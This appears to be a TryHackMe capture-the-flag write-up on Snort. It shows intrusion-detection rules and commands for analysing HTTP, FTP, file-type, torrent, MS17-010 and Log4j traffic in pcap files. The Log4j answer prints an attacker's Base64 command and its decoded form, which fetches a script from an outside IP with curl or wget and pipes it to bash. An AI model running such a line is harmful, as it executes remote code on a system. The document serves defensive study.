Snort Write -Up THM
AS Using Linux terminal there are more way to achieve the same goal.?
Important notes dump:
sudo snort -c /etc/snort/snort.conf -A full -l . -r mx-1.pcap
reading packet sniffer
sudo snort -dev -K ASCII
content:"|47 45 54|"
/etc/snort/rules/local.rules
opening the log file with TCPdump
sudo tcpdump -r snort.log.1638459842 -ntc 10
#####################
WRITE-UP Task 2
Go to the folder of the task
cd Desktop/Exercise-Files/TASK-2\ \(HTTP)/
Once inside the folder apply the local rule as requested:
sudo gedit /home/ubuntu/Desktop/Exercise-Files/TASK-2\ \(HTTP)/local.rules
HTTP Rules
alert tcp any 80 <> any any (msg: "HTTP FOUND"; sid: 100001; rev: 1;)
alert tcp any any <> any 80 (msg: "HTTP FOUND"; sid: 100002; rev: 1;)
Let s apply this rule to the pcap given:
sudo snort -c /home/ubuntu/Desktop/Exercise-Files/TASK-2\ \(HTTP)/local.rules -A full -l . -r mx-1.pcap
Total packets:
number 328
now let s get the packet needed.
use sudo snort -r #logfilename -n #number of packet
sudo snort -r snort.log.16700022 -n 63
dst IP:?145.254.160.237
sudo snort -r?snort.log.16700022 -n 64
ACK:?0X38AFFFF3
sudo snort -r snort.log.16700022 -n 62
SEQ: 0X38AFFFF3
sudo snort -r snort.log.16700022 -n 65
TTL: 128
Src IP: 145.254.160.237
Src Port: 3372
etc..
Task 3:
Desktop/Exercise-Files/TASK-3 (FTP)
adding your own rule:
gedit local.rules
Rules:
FTP
alert tcp any 21 <> any any (msg: "HTTP FOUND"; sid: 100001; rev: 1;)
alert tcp any any <> any 21 (msg: "HTTP FOUND"; sid: 100002; rev: 1;)
sudo snort -c /home/ubuntu/Desktop/Exercise-Files/TASK-3\ \(FTP)/local.rules -A full -l . -r ftp-png-gif.pcap
Total packets: 614
we can analyze the pcap file.
sudo snort -r snort.log.1565 -d "tcp and port 21" -n 10
FTP service name: Microsoft FTP Service
Failed login attempts
alert tcp any any <> any 21 (msg: "Failed FTP Login"; content:"530 User"; sid: 100003; rev: 1;)
Hint: Each failed FTP login attempt prompts a default message with the pattern; "530 User". Try to filter the given pattern in the inbound FTP traffic
Ans: 41
Write a rule to detect successful FTP logins in the given pcap.
alert tcp any any <> any 21 (msg: "Sucessful FTP Login"; content:"230 User"; sid: 100004; rev: 1;)
Ans:1
Write a rule to detect failed FTP login attempts with a valid username but a bad password or no password.
Useful resource: https://hstechdocs.helpsystems.com/manuals/globalscape/cuteftpmacpro3/Numbered_FTP_status_and_error_codes.htm
Hint: Each FTP login attempt with a valid username and bad password prompts a default message with the pattern; "331 Password". Try to filter the given pattern in the FTP traffic. Try to filter the given username.
alert tcp any any <> any 21 (msg: "Failed FTP/Good_Usr/BadPass"; content:"331 Password"; sid: 100004; rev: 1;)
Ans:42
Write a rule to detect failed FTP login attempts with "Administrator" username but a bad password or no password.
Hint: You can use the "content" filter more than one time.
alert tcp any any <> any 21 (msg: "Failed Admin Login Attempt"; content:"Administrator"; content:"331 Password"; sid: 100005; rev: 1;)
Ans: 7
sudo snort -c local.rules -dev -l . -r ftp-png......
Task 4
Write a rule to detect the PNG file in the given pcap.
reference:image magic number Wikipedia
Please if you use wikipedia offer a coffe a year for the service :)
It is an open source but in this world nothing is for free.
Include the numbers into pipe ||; pipe tell snort thet there is binary data in it
alert tcp any any <> any any (msg: "PNG FOUND"; content: "|89 50 4E 47 0D 0A 1A 0A|"; sid: 1000001; rev:01;)
sudo snort -r snort.log.16... -A cmg
Ans: Adobe ImageRead
Write a rule to detect the GIF file in the given pcap.
reference:same as the above
47 49 46 38 37 61
or
GIF87a
GIF89a
alert tcp any any <> any any (msg: "GIF FOUND"; content: "|47 49 46 38 37 61|"; sid: 1000001; rev:01;)
alert tcp any any <> any any (msg: "GIF FOUND"; content: "|GIF87a|"; sid: 1000001; rev:01;)
领英推荐
alert tcp any any <> any any (msg:"GIF FOUND"; content:"GIF89a"; sid:1000001; rev:01;)
sudo snort -d -r snort.log.1515
ANS:GIF89a
Task 5
Write a rule to detect the torrent metafile in the given pcap.
Personally the content string
alert tcp any any <> any any (msg:"TORRENT FOUND"; content:"torrent"; sid:1000001; rev:01;)
sudo snort -c local.rules -A full -l . -r torrent.....
Ans:2
What is the name of the torrent application?
xbittorrent
What is the MIME (Multipurpose Internet Mail Extensions) type of the torrent metafile?
application/x-bittorrent
What is the hostname of the torrent metafile?
tracker2.torrentbox.com
Task 6
You can test each ruleset with the following command structure;
sudo snort -c local-X.rules -r mx-1.pcap -A console
Fix the syntax error in local-1.rules file and make it work smoothly.
What is the number of the detected packets?
(Add a space after any)
16
Fix the syntax error in local-2.rules file and make it work smoothly.
Add 'any' for the port number.
What is the number of the detected packets?
68
Fix the syntax error in local-3.rules file and make it work smoothly.
Check the sid number....
What is the number of the detected packets?
87
Fix the syntax error in local-4.rules file and make it work smoothly.
Sid number and semicolons instaed of a double columns
What is the number of the detected packets?
90
Fix the syntax error in local-5.rules file and make it work smoothly.
Columns and ->
What is the number of the detected packets?
155
Fix the logical error in local-6.rules file and make it work smoothly to create alerts.
67 65 74 = get
add 'nocase after the first content'
What is the number of the detected packets?
2
Fix the logical error in local-7.rules file and make it work smoothly to create alerts.
2E 68 74 6D 6C = html
Missing the message
What is the name of the required option:
MSG
Task7
Use the given rule file (local.rules) to investigate the ms1710 exploitation.
sudo snort -c local.rules -r ms17....??-A console
What is the number of detected packets?
25154
Clear the previous log and alarm files.
Use local-1.rules empty file to write a new rule to detect payloads containing the "\IPC$" keyword.
alert tcp any any <> any any (mgs:"IPC FOUND"; content:"IPC$";nocase;sid:1000001;rev:1;)
or avoid the escape carachter by using '\\'.
What is the number of detected packets?
12
What is the requested path?
read the log and look on the hex output
\\192.168.116.138\IPC$
What is the CVSS v2 score of the MS17-010 vulnerability?
Check the NIST database
9.3
Task 8
Use the given rule file (local.rules) to investigate the log4j exploitation.
What is the number of detected packets?
26
How many rules were triggered?.
The hint recommend to use the cli; thus read the alert and find something in coomn to be able to view it.
cat alert | grep "210037*"
4
What are the first six digits of the triggered rule sids?
210037
Use local-1.rules empty file to write a new rule to detect packet payloads between 770 and 855 bytes.
alert tcp any any <> any any (msg:"BYTES FOUND"; dsize:770<>855; sid:1000001; rev:1;)
What is the number of detected packets?
41
What is the name of the used encoding algorithm?
Base64
What is the IP ID of the corresponding packet?
62808
What is the attacker's command?
KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=
USE Cyberchef
(curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|bash
What is the CVSS v2 score of the Log4j vulnerability?
9.3
Nice one!!!